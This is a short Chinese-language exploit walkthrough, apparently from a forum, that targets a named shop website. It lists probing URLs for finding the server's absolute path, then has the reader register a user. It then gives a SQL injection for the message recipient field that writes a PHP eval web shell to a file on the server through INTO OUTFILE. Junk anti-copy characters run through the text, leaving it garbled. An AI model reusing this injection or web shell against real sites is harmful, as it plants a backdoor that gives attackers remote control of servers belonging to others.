第一个:想办法找到目标网站的绝对路径
1 ?* ~: R$ ]& S2 Q \
' K9 n3 a: l0 e) X0 l2 l0 a' Yhttp://www.political-security.com/install/svinfo.php?phpinfo=true
0 j; g5 w! [& F [5 a
% m9 L# w4 I5 `& Xhttp:/www.political-security.com/core/api/shop_api.php/ t! G. w) a$ g3 F4 Z3 u
$ O! W! o, }$ Q$ f, N; `6 W
http://www.political-security.co ... api_b2b_2_0_cat.php
$ N( L/ e! k4 ?3 j
; u# u r) X% M' ~" ghttp://www.political-security.com/core/ap ... b_2_0_goodstype.php
4 J" ?6 h. f# d& g4 ]' V6 L3 J4 f& b2 ~5 A1 [. Z3 p6 P" S
http://www.political-security.co ... i_b2b_2_0_brand.php1 {# J0 U6 B" _5 W$ g
第二个:注册一个普通用户
1 @; f: n9 `! _# e* ~, u. [& T
, J5 Y5 [- S/ L$ Ihttp://www.political-security.com/?passport-signup.html
$ [- \3 c: | F& Z1 g; i
2 l$ c/ f) }% i# Y/ v, I4 N第三个: 发送消息
4 B# I( d/ L" D, y. c, Z [9 S$ D0 u
http://www.political-security.com/?member-send.html$ W" A, D* C0 n' ~( I4 Y
发送给中填写
3 O! {0 l7 D, `1 ?4 |2 `3 h7 cantian365.com' union select CHAR(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 39, 35, 39, 93, 41, 59, 63, 62) into outfile 'E:/zkeysoft/www/x.php' # |